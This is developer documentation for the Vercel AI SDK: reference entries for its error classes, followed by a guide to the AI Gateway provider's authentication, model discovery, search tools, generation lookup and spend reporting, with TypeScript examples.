This error occurs when an invalid argument was provided.
Properties
- parameter: The name of the parameter that is invalid
- value: The invalid value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidArgumentError using:
import { InvalidArgumentError } from 'ai';
if (InvalidArgumentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError
AI_InvalidDataContentError
This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages.
Properties
- content: The invalid content value
- cause: The underlying error that caused this error (optional)
- message: The error message describing the expected and received content types (optional, auto-generated)
Checking for this Error
You can check if an error is an instance of AI_InvalidDataContentError using:
import { InvalidDataContentError } from 'ai';
if (InvalidDataContentError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError
AI_InvalidMessageRoleError
This error occurs when an invalid message role is provided.
Properties
- role: The invalid role value
- message: The error message (optional, auto-generated from role)
Checking for this Error
You can check if an error is an instance of AI_InvalidMessageRoleError using:
import { InvalidMessageRoleError } from 'ai';
if (InvalidMessageRoleError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError
AI_InvalidPromptError
This error occurs when the prompt provided is invalid.
Potential Causes
UI Messages
You are passing a UIMessage[] as messages into e.g. streamText.
You need to first convert them to a ModelMessage[] using convertToModelMessages().
import { type UIMessage, generateText, convertToModelMessages } from 'ai';
const messages: UIMessage[] = [
/* ... */
];
const result = await generateText({
// ...
messages: await convertToModelMessages(messages),
});
Properties
- prompt: The invalid prompt value
- message: The error message (required in constructor)
- cause: The cause of the error (optional)
Checking for this Error
You can check if an error is an instance of AI_InvalidPromptError using:
import { InvalidPromptError } from 'ai';
if (InvalidPromptError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError
AI_InvalidResponseDataError
This error occurs when the server returns a response with invalid data content.
Properties
- data: The invalid response data value
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_InvalidResponseDataError using:
import { InvalidResponseDataError } from 'ai';
if (InvalidResponseDataError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidToolApprovalError description: Learn how to fix AI_InvalidToolApprovalError
AI_InvalidToolApprovalError
This error occurs when a tool approval response references an unknown approvalId. No matching tool-approval-request was found in the message history.
Properties
- approvalId: The approval ID that was not found
Checking for this Error
You can check if an error is an instance of AI_InvalidToolApprovalError using:
import { InvalidToolApprovalError } from 'ai';
if (InvalidToolApprovalError.isInstance(error)) {
// Handle the error
}
title: AI_InvalidToolInputError description: Learn how to fix AI_InvalidToolInputError
AI_InvalidToolInputError
This error occurs when invalid tool input was provided.
Properties
- toolName: The name of the tool with invalid inputs
- toolInput: The invalid tool inputs
- message: The error message
- cause: The cause of the error
Checking for this Error
You can check if an error is an instance of AI_InvalidToolInputError using:
import { InvalidToolInputError } from 'ai';
if (InvalidToolInputError.isInstance(error)) {
// Handle the error
}
title: AI_JSONParseError description: Learn how to fix AI_JSONParseError
AI_JSONParseError
This error occurs when JSON fails to parse.
Properties
- text: The text value that could not be parsed
- cause: The underlying parsing error (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_JSONParseError using:
import { JSONParseError } from 'ai';
if (JSONParseError.isInstance(error)) {
// Handle the error
}
title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError
AI_LoadAPIKeyError
This error occurs when an API key is not loaded successfully.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadAPIKeyError using:
import { LoadAPIKeyError } from 'ai';
if (LoadAPIKeyError.isInstance(error)) {
// Handle the error
}
title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError
AI_LoadSettingError
This error occurs when a setting is not loaded successfully.
Properties
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_LoadSettingError using:
import { LoadSettingError } from 'ai';
if (LoadSettingError.isInstance(error)) {
// Handle the error
}
title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError
AI_MessageConversionError
This error occurs when message conversion fails.
Properties
- originalMessage: The original message that failed conversion
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_MessageConversionError using:
import { MessageConversionError } from 'ai';
if (MessageConversionError.isInstance(error)) {
// Handle the error
}
title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError
AI_NoContentGeneratedError
This error occurs when the AI provider fails to generate content.
Properties
- message: The error message (optional, defaults to 'No content generated.')
Checking for this Error
You can check if an error is an instance of AI_NoContentGeneratedError using:
import { NoContentGeneratedError } from 'ai';
if (NoContentGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError
AI_NoImageGeneratedError
This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated an invalid response.
Properties
- message: The error message (optional, defaults to 'No image generated.').
- responses: Metadata about the image model responses, including timestamp, model, and headers (optional).
- cause: The cause of the error. You can use this for more detailed error handling (optional).
Checking for this Error
You can check if an error is an instance of AI_NoImageGeneratedError using:
import { generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError
AI_NoObjectGeneratedError
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
Properties
- message: The error message (optional, defaults to 'No object generated.').
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode (optional).
- response: Metadata about the language model response, including response id, timestamp, and model (required in constructor).
- usage: Request token usage (required in constructor).
- finishReason: Request finish reason. For example 'length' if the model generated the maximum number of tokens, which could result in a JSON parsing error (required in constructor).
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling (optional).
Checking for this Error
You can check if an error is an instance of AI_NoObjectGeneratedError using:
import { generateText, NoObjectGeneratedError, Output } from 'ai';
try {
await generateText({ model, output: Output.object({ schema }), prompt });
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
console.log('Finish Reason:', error.finishReason);
}
}
title: AI_NoOutputGeneratedError description: Learn how to fix AI_NoOutputGeneratedError
AI_NoOutputGeneratedError
This error is thrown when no LLM output was generated, e.g. because of errors.
Properties
- message: The error message (optional, defaults to 'No output generated.')
- cause: The underlying error that caused no output to be generated (optional)
Checking for this Error
You can check if an error is an instance of AI_NoOutputGeneratedError using:
import { NoOutputGeneratedError } from 'ai';
if (NoOutputGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSpeechGeneratedError description: Learn how to fix AI_NoSpeechGeneratedError
AI_NoSpeechGeneratedError
This error occurs when no audio could be generated from the input.
Properties
- responses: Array of speech model response metadata (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_NoSpeechGeneratedError using:
import { NoSpeechGeneratedError } from 'ai';
if (NoSpeechGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError
AI_NoSuchModelError
This error occurs when a model ID is not found.
Properties
- modelId: The ID of the model that was not found
- modelType: The type of model ('languageModel', 'embeddingModel', 'imageModel', 'transcriptionModel', 'speechModel', or 'rerankingModel')
- message: The error message (optional, auto-generated from modelId and modelType)
Checking for this Error
You can check if an error is an instance of AI_NoSuchModelError using:
import { NoSuchModelError } from 'ai';
if (NoSuchModelError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError
AI_NoSuchProviderError
This error occurs when a provider ID is not found.
Properties
- providerId: The ID of the provider that was not found
- availableProviders: Array of available provider IDs
- modelId: The ID of the model
- modelType: The type of model
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchProviderError using:
import { NoSuchProviderError } from 'ai';
if (NoSuchProviderError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError
AI_NoSuchToolError
This error occurs when a model tries to call an unavailable tool.
Properties
- toolName: The name of the tool that was not found
- availableTools: Array of available tool names (optional)
- message: The error message (optional, auto-generated from toolName and availableTools)
Checking for this Error
You can check if an error is an instance of AI_NoSuchToolError using:
import { NoSuchToolError } from 'ai';
if (NoSuchToolError.isInstance(error)) {
// Handle the error
}
title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError
AI_NoTranscriptGeneratedError
This error occurs when no transcript could be generated from the input.
Properties
- responses: Array of transcription model response metadata (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_NoTranscriptGeneratedError using:
import { NoTranscriptGeneratedError } from 'ai';
if (NoTranscriptGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoVideoGeneratedError description: Learn how to fix AI_NoVideoGeneratedError
AI_NoVideoGeneratedError
This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated an invalid response.
Properties
- message: The error message (optional, defaults to 'No video generated.').
- responses: Metadata about the video model responses, including timestamp, model, and headers (optional).
- cause: The cause of the error. You can use this for more detailed error handling (optional).
Checking for this Error
You can check if an error is an instance of AI_NoVideoGeneratedError using:
import {
experimental_generateVideo as generateVideo,
NoVideoGeneratedError,
} from 'ai';
try {
await generateVideo({ model, prompt });
} catch (error) {
if (NoVideoGeneratedError.isInstance(error)) {
console.log('NoVideoGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
title: AI_RetryError description: Learn how to fix AI_RetryError
AI_RetryError
This error occurs when a retry operation fails.
Properties
- reason: The reason for the retry failure
- lastError: The most recent error that occurred during retries
- errors: Array of all errors that occurred during retry attempts
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_RetryError using:
import { RetryError } from 'ai';
if (RetryError.isInstance(error)) {
// Handle the error
}
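The documented properties let you inspect every failed attempt (a minimal sketch):
import { RetryError } from 'ai';
if (RetryError.isInstance(error)) {
  console.error('Retries exhausted:', error.reason);
  console.error('Last error:', error.lastError);
  // one entry per retry attempt
  for (const attemptError of error.errors) {
    console.error('Attempt failed:', attemptError);
  }
}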
title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError
AI_TooManyEmbeddingValuesForCallError
This error occurs when too many values are provided in a single embedding call.
Properties
- provider: The AI provider name
- modelId: The ID of the embedding model
- maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
- values: The array of values that was provided
Checking for this Error
You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:
import { TooManyEmbeddingValuesForCallError } from 'ai';
if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
// Handle the error
}
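One way to recover is to split the input into batches no larger than the documented maxEmbeddingsPerCall limit (a minimal sketch; the batching logic here is illustrative and not part of the SDK):
import { TooManyEmbeddingValuesForCallError } from 'ai';
if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
  const batchSize = error.maxEmbeddingsPerCall;
  const batches: unknown[][] = [];
  // chunk the rejected values into allowed batch sizes
  for (let i = 0; i < error.values.length; i += batchSize) {
    batches.push(error.values.slice(i, i + batchSize));
  }
  // re-run your embedding call once per batch and concatenate the results
}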
title: AI_ToolCallNotFoundForApprovalError description: Learn how to fix AI_ToolCallNotFoundForApprovalError
AI_ToolCallNotFoundForApprovalError
This error occurs when a tool approval request references a tool call that was not found. This can happen when processing provider-emitted approval requests (e.g., MCP flows) where the referenced tool call ID does not exist.
Properties
- toolCallId: The tool call ID that was not found
- approvalId: The approval request ID
Checking for this Error
You can check if an error is an instance of AI_ToolCallNotFoundForApprovalError using:
import { ToolCallNotFoundForApprovalError } from 'ai';
if (ToolCallNotFoundForApprovalError.isInstance(error)) {
// Handle the error
}
title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError
ToolCallRepairError
This error occurs when there is a failure while attempting to repair an invalid tool call.
This typically happens when the AI attempts to fix either
a NoSuchToolError or InvalidToolInputError.
Properties
- originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolInputError)
- message: The error message
- cause: The underlying error that caused the repair to fail
Checking for this Error
You can check if an error is an instance of ToolCallRepairError using:
import { ToolCallRepairError } from 'ai';
if (ToolCallRepairError.isInstance(error)) {
// Handle the error
}
title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError
AI_TypeValidationError
This error occurs when type validation fails.
Properties
- value: The value that failed validation
- cause: The underlying validation error (required in constructor)
Checking for this Error
You can check if an error is an instance of AI_TypeValidationError using:
import { TypeValidationError } from 'ai';
if (TypeValidationError.isInstance(error)) {
// Handle the error
}
title: AI_UIMessageStreamError description: Learn how to fix AI_UIMessageStreamError
AI_UIMessageStreamError
This error occurs when a UI message stream contains invalid or out-of-sequence chunks.
Common causes:
- Receiving a text-delta chunk without a preceding text-start chunk
- Receiving a text-end chunk without a preceding text-start chunk
- Receiving a reasoning-delta chunk without a preceding reasoning-start chunk
- Receiving a reasoning-end chunk without a preceding reasoning-start chunk
- Receiving a tool-input-delta chunk without a preceding tool-input-start chunk
- Attempting to access a tool invocation that doesn't exist
This error often surfaces when an upstream request fails before any tokens are streamed and a custom transport tries to write an inline error message to the UI stream without the proper start chunk.
Properties
- chunkType: The type of chunk that caused the error (e.g., text-delta, reasoning-end, tool-input-delta)
- chunkId: The ID associated with the failing chunk (part ID or toolCallId)
- message: The error message with details about what went wrong
Checking for this Error
You can check if an error is an instance of AI_UIMessageStreamError using:
import { UIMessageStreamError } from 'ai';
if (UIMessageStreamError.isInstance(error)) {
console.log('Chunk type:', error.chunkType);
console.log('Chunk ID:', error.chunkId);
// Handle the error
}
Common Solutions
- Ensure proper chunk ordering: Always send a *-start chunk before any *-delta or *-end chunks for the same ID:
// Correct order
writer.write({ type: 'text-start', id: 'my-text' });
writer.write({ type: 'text-delta', id: 'my-text', delta: 'Hello' });
writer.write({ type: 'text-end', id: 'my-text' });
- Verify IDs match: Ensure the id used in *-delta and *-end chunks matches the id used in the corresponding *-start chunk.
- Handle error paths correctly: When writing error messages in custom transports, ensure you emit the full start/delta/end sequence:
// When handling errors in custom transports
writer.write({ type: 'text-start', id: errorId });
writer.write({ type: 'text-delta', id: errorId, delta: 'Request failed...' });
writer.write({ type: 'text-end', id: errorId });
- Check stream producer logic: Review your streaming implementation to ensure chunks are sent in the correct order, especially when dealing with concurrent operations or merged streams.
title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError
AI_UnsupportedFunctionalityError
This error occurs when functionality is not supported.
Properties
- functionality: The name of the unsupported functionality
- message: The error message (optional, auto-generated from functionality)
Checking for this Error
You can check if an error is an instance of AI_UnsupportedFunctionalityError using:
import { UnsupportedFunctionalityError } from 'ai';
if (UnsupportedFunctionalityError.isInstance(error)) {
// Handle the error
}
title: AI Gateway description: Learn how to use the AI Gateway provider with the AI SDK.
AI Gateway Provider
The AI Gateway provider connects you to models from multiple AI providers through a single interface. Instead of integrating with each provider separately, you can access OpenAI, Anthropic, Google, Meta, xAI, and other providers and their models.
Features
- Access models from multiple providers without having to install additional provider modules/dependencies
- Use the same code structure across different AI providers
- Switch between models and providers easily
- Automatic authentication when deployed on Vercel
- View pricing information across providers
- Observability for AI model usage through the Vercel dashboard
Setup
The Vercel AI Gateway provider is part of the AI SDK.
Basic Usage
For most use cases, you can use the AI Gateway directly with a model string:
// use plain model string with global provider
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4",
prompt: "Hello world",
});
// use provider instance (requires version 5.0.36 or later)
import { generateText, gateway } from "ai";
const { text } = await generateText({
model: gateway("openai/gpt-5.4"),
prompt: "Hello world",
});
The AI SDK automatically uses the AI Gateway when you pass a model string in the creator/model-name format.
Provider Instance
You can also import the default provider instance gateway from ai:
import { gateway } from "ai";
You may want to create a custom provider instance when you need to:
- Set custom configuration options (API key, base URL, headers)
- Use the provider in a provider registry
- Wrap the provider with middleware
- Use different settings for different parts of your application
To create a custom provider instance, import createGateway from ai:
import { createGateway } from "ai";
const gateway = createGateway({
apiKey: process.env.AI_GATEWAY_API_KEY ?? "",
});
You can use the following optional settings to customize the AI Gateway provider instance:
- baseURL string
  Use a different URL prefix for API calls. The default prefix is https://ai-gateway.vercel.sh/v3/ai.
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the AI_GATEWAY_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- metadataCacheRefreshMillis number
  How frequently to refresh the metadata cache in milliseconds. Defaults to 5 minutes (300,000 ms).
Authentication
The Gateway provider supports two authentication methods:
API Key Authentication
Set your API key via environment variable:
AI_GATEWAY_API_KEY=your_api_key_here
Or pass it directly to the provider:
import { createGateway } from "ai";
const gateway = createGateway({
apiKey: "your_api_key_here",
});
OIDC Authentication (Vercel Deployments)
When deployed to Vercel, the AI Gateway provider supports authenticating using OIDC (OpenID Connect) tokens without API Keys.
How OIDC Authentication Works
- In Production/Preview Deployments:
  - OIDC authentication is automatically handled
  - No manual configuration needed
  - Tokens are automatically obtained and refreshed
- In Local Development:
  - First, install and authenticate with the Vercel CLI
  - Run vercel env pull to download your project's OIDC token locally
  - For automatic token management:
    - Use vercel dev to start your development server - this will handle token refreshing automatically
  - For manual token management:
    - If not using vercel dev, note that OIDC tokens expire after 12 hours
    - You'll need to run vercel env pull again to refresh the token before it expires
Read more about using OIDC tokens in the Vercel AI Gateway docs.
Bring Your Own Key (BYOK)
You can connect your own provider credentials to use with Vercel AI Gateway. This lets you use your existing provider accounts and access private resources.
To set up BYOK, add your provider credentials in your Vercel team's AI Gateway settings. Once configured, AI Gateway automatically uses your credentials. No code changes are needed.
Learn more in the BYOK documentation.
Language Models
You can create language models using a provider instance. The first argument is the model ID in the format creator/model-name:
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4",
prompt: "Explain quantum computing in simple terms",
});
AI Gateway language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).
Reranking Models
You can create reranking models using the rerankingModel method on the provider instance:
import { rerank } from "ai";
import { gateway } from "@ai-sdk/gateway";
const { ranking } = await rerank({
model: gateway.rerankingModel("cohere/rerank-v3.5"),
query: "What is the capital of France?",
documents: [
"Paris is the capital of France.",
"Berlin is the capital of Germany.",
"Madrid is the capital of Spain.",
],
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 0, score: 0.89, document: 'Paris is the capital of France.' },
// { originalIndex: 2, score: 0.15, document: 'Madrid is the capital of Spain.' },
// ]
Reranking models are useful for improving search results in retrieval-augmented generation (RAG) pipelines by re-scoring candidate documents after an initial retrieval step.
Available Models
The AI Gateway supports models from OpenAI, Anthropic, Google, Meta, xAI, Mistral, DeepSeek, Amazon Bedrock, Cohere, Perplexity, Alibaba, and other providers.
For the complete list of available models, see the AI Gateway documentation.
Dynamic Model Discovery
You can discover available models programmatically:
import { gateway, generateText } from "ai";
const availableModels = await gateway.getAvailableModels();
// List all available models
availableModels.models.forEach((model) => {
console.log(`${model.id}: ${model.name}`);
if (model.description) {
console.log(` Description: ${model.description}`);
}
if (model.pricing) {
console.log(` Input: $${model.pricing.input}/token`);
console.log(` Output: $${model.pricing.output}/token`);
if (model.pricing.cachedInputTokens) {
console.log(
` Cached input (read): $${model.pricing.cachedInputTokens}/token`,
);
}
if (model.pricing.cacheCreationInputTokens) {
console.log(
` Cache creation (write): $${model.pricing.cacheCreationInputTokens}/token`,
);
}
}
});
// Use any discovered model with plain string
const { text } = await generateText({
model: availableModels.models[0].id, // e.g., 'openai/gpt-5.4'
prompt: "Hello world",
});
Credit Usage
You can check your team's current credit balance and usage:
import { gateway } from "ai";
const credits = await gateway.getCredits();
console.log(`Team balance: ${credits.balance} credits`);
console.log(`Team total used: ${credits.total_used} credits`);
The getCredits() method returns your team's credit information based on the authenticated API key or OIDC token:
- balance number - Your team's current available credit balance
- total_used number - Total credits consumed by your team
Generation Lookup
Look up detailed information about a specific generation by its ID, including cost, token usage, latency, and provider details. Generation IDs are available in providerMetadata.gateway.generationId on both generateText and streamText responses.
When streaming, the generation ID is injected on the first content chunk, so you can capture it early in the stream without waiting for completion. This is especially useful in cases where a network interruption or mid-stream error could prevent you from receiving the final response — since the gateway records the final status server-side, you can use the generation ID to look up the results (including cost, token usage, and finish reason) later via getGenerationInfo().
import { gateway, generateText } from "ai";
// Make a request
const result = await generateText({
model: gateway("anthropic/claude-sonnet-4"),
prompt: "Explain quantum entanglement briefly",
});
// Get the generation ID from provider metadata
const generationId = result.providerMetadata?.gateway?.generationId;
// Look up detailed generation info
const generation = await gateway.getGenerationInfo({ id: generationId });
console.log(`Model: ${generation.model}`);
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Latency: ${generation.latency}ms`);
console.log(`Prompt tokens: ${generation.promptTokens}`);
console.log(`Completion tokens: ${generation.completionTokens}`);
With streamText, you can capture the generation ID from the first chunk via fullStream:
import { gateway, streamText } from "ai";
const result = streamText({
model: gateway("anthropic/claude-sonnet-4"),
prompt: "Explain quantum entanglement briefly",
});
let generationId: string | undefined;
for await (const part of result.fullStream) {
if (!generationId && part.providerMetadata?.gateway?.generationId) {
generationId = part.providerMetadata.gateway.generationId as string;
console.log(`Generation ID (early): ${generationId}`);
}
}
// Look up cost and usage after the stream completes
if (generationId) {
const generation = await gateway.getGenerationInfo({ id: generationId });
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Finish reason: ${generation.finishReason}`);
}
The getGenerationInfo() method accepts:
- id string - The generation ID to look up (format: gen_<ulid>, required)
It returns a GatewayGenerationInfo object with the following fields:
- id string - The generation ID
- totalCost number - Total cost in USD
- upstreamInferenceCost number - Upstream inference cost in USD (relevant for BYOK)
- usage number - Usage cost in USD (same as totalCost)
- createdAt string - ISO 8601 timestamp when the generation was created
- model string - Model identifier used
- isByok boolean - Whether Bring Your Own Key credentials were used
- providerName string - The provider that served this generation
- streamed boolean - Whether streaming was used
- finishReason string - Finish reason (e.g. 'stop')
- latency number - Time to first token in milliseconds
- generationTime number - Total generation time in milliseconds
- promptTokens number - Number of prompt tokens
- completionTokens number - Number of completion tokens
- reasoningTokens number - Reasoning tokens used (if applicable)
- cachedTokens number - Cached tokens used (if applicable)
- cacheCreationTokens number - Cache creation input tokens
- billableWebSearchCalls number - Number of billable web search calls
Examples
Basic Text Generation
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Write a haiku about programming",
});
console.log(text);
Streaming
import { streamText } from "ai";
const { textStream } = streamText({
model: "openai/gpt-5.4",
prompt: "Explain the benefits of serverless architecture",
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
Tool Usage
import { generateText, tool } from "ai";
import { z } from "zod";
const { text } = await generateText({
model: "xai/grok-4",
prompt: "What is the weather like in San Francisco?",
tools: {
getWeather: tool({
description: "Get the current weather for a location",
inputSchema: z.object({
location: z.string().describe("The location to get weather for"),
}),
execute: async ({ location }) => {
// Your weather API call here
return `It's sunny in ${location}`;
},
}),
},
});
Provider-Executed Tools
Some providers offer tools that are executed by the provider itself, such as OpenAI's web search tool. To use these tools through AI Gateway, import the provider to access the tool definitions:
import { generateText, stepCountIs } from "ai";
import { openai } from "@ai-sdk/openai";
const result = await generateText({
model: "openai/gpt-5.4-mini",
prompt: "What is the Vercel AI Gateway?",
stopWhen: stepCountIs(10),
tools: {
web_search: openai.tools.webSearch({}),
},
});
console.dir(result.text);
Gateway Tools
The AI Gateway provider includes built-in tools that are executed by the gateway itself. These tools can be used with any model through the gateway.
Perplexity Search
The Perplexity Search tool enables models to search the web using Perplexity's search API. This tool is executed by the AI Gateway and returns web search results that the model can use to provide up-to-date information.
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt: "Search for news about AI regulations in January 2025.",
tools: {
perplexity_search: gateway.tools.perplexitySearch(),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
You can also configure the search with optional parameters:
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt:
"Search for news about AI regulations from the first week of January 2025.",
tools: {
perplexity_search: gateway.tools.perplexitySearch({
maxResults: 5,
searchLanguageFilter: ["en"],
country: "US",
searchDomainFilter: ["reuters.com", "bbc.com", "nytimes.com"],
}),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
The Perplexity Search tool supports the following optional configuration options:
- maxResults number
  The maximum number of search results to return (1-20, default: 10).
- maxTokensPerPage number
  The maximum number of tokens to extract per search result page (256-2048, default: 2048).
- maxTokens number
  The maximum total tokens across all search results (default: 25000, max: 1000000).
- searchLanguageFilter string[]
  Filter search results by language using ISO 639-1 language codes (e.g., ['en'] for English, ['en', 'es'] for English and Spanish).
- country string
  Filter search results by country using ISO 3166-1 alpha-2 country codes (e.g., 'US' for United States, 'GB' for United Kingdom).
- searchDomainFilter string[]
  Limit search results to specific domains (e.g., ['reuters.com', 'bbc.com']). This is useful for restricting results to trusted sources.
- searchRecencyFilter 'day' | 'week' | 'month' | 'year'
  Filter search results by relative time period. Useful for always getting recent results (e.g., 'week' for results from the last week).
The tool works with both generateText and streamText:
import { gateway, streamText } from "ai";
const result = streamText({
model: "openai/gpt-5.4-nano",
prompt: "Search for the latest news about AI regulations.",
tools: {
perplexity_search: gateway.tools.perplexitySearch(),
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case "text-delta":
process.stdout.write(part.text);
break;
case "tool-call":
console.log("\nTool call:", JSON.stringify(part, null, 2));
break;
case "tool-result":
console.log("\nTool result:", JSON.stringify(part, null, 2));
break;
}
}
Parallel Search
The Parallel Search tool enables models to search the web using Parallel AI's Search API. This tool is optimized for LLM consumption, returning relevant excerpts from web pages that can replace multiple keyword searches with a single call.
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt: "Research the latest developments in quantum computing.",
tools: {
parallel_search: gateway.tools.parallelSearch(),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
You can also configure the search with optional parameters:
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt: "Find detailed information about TypeScript 5.0 features.",
tools: {
parallel_search: gateway.tools.parallelSearch({
mode: "agentic",
maxResults: 5,
sourcePolicy: {
includeDomains: ["typescriptlang.org", "github.com"],
},
excerpts: {
maxCharsPerResult: 8000,
},
}),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
The Parallel Search tool supports the following optional configuration options:
- mode 'one-shot' | 'agentic'
  Mode preset for different use cases:
  - 'one-shot' - Comprehensive results with longer excerpts for single-response answers (default)
  - 'agentic' - Concise, token-efficient results optimized for multi-step agentic workflows
- maxResults number
  Maximum number of results to return (1-20). Defaults to 10 if not specified.
- sourcePolicy object
  Source policy for controlling which domains to include/exclude:
  - includeDomains - List of domains to include in search results
  - excludeDomains - List of domains to exclude from search results
  - afterDate - Only include results published after this date (ISO 8601 format)
- excerpts object
  Excerpt configuration for controlling result length:
  - maxCharsPerResult - Maximum characters per result
  - maxCharsTotal - Maximum total characters across all results
- fetchPolicy object
  Fetch policy for controlling content freshness:
  - maxAgeSeconds - Maximum age in seconds for cached content (set to 0 for always fresh)
The tool works with both generateText and streamText:
import { gateway, streamText } from "ai";
const result = streamText({
model: "openai/gpt-5.4-nano",
prompt: "Research the latest AI safety guidelines.",
tools: {
parallel_search: gateway.tools.parallelSearch(),
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case "text-delta":
process.stdout.write(part.text);
break;
case "tool-call":
console.log("\nTool call:", JSON.stringify(part, null, 2));
break;
case "tool-result":
console.log("\nTool result:", JSON.stringify(part, null, 2));
break;
}
}
Usage Tracking with User and Tags
Track usage per end-user and categorize requests with tags:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4",
prompt: "Summarize this document...",
providerOptions: {
gateway: {
user: "user-abc-123", // Track usage for this specific end-user
tags: ["document-summary", "premium-feature"], // Categorize for reporting
} satisfies GatewayProviderOptions,
},
});
This allows you to:
- View usage and costs broken down by end-user in your analytics
- Filter and analyze spending by feature or use case using tags
- Track which users or features are driving the most AI usage
Querying Spend Reports
Use the getSpendReport() method to query usage data programmatically. The reporting API is only available for Vercel Pro and Enterprise plans. For pricing, see the Custom Reporting docs.
import { gateway } from "ai";
const report = await gateway.getSpendReport({
startDate: "2026-03-01",
endDate: "2026-03-25",
groupBy: "model",
});
for (const row of report.results) {
console.log(`${row.model}: $${row.totalCost.toFixed(4)}`);
}
The getSpendReport() method accepts the following parameters:
- startDate string - Start date in YYYY-MM-DD format (inclusive, required)
- endDate string - End date in YYYY-MM-DD format (inclusive, required)
- groupBy string - Aggregation dimension: 'day' (default), 'user', 'model', 'tag', 'provider', or 'credential_type'
- datePart string - Time granularity when groupBy is 'day': 'day' or 'hour'
- userId string - Filter to a specific user
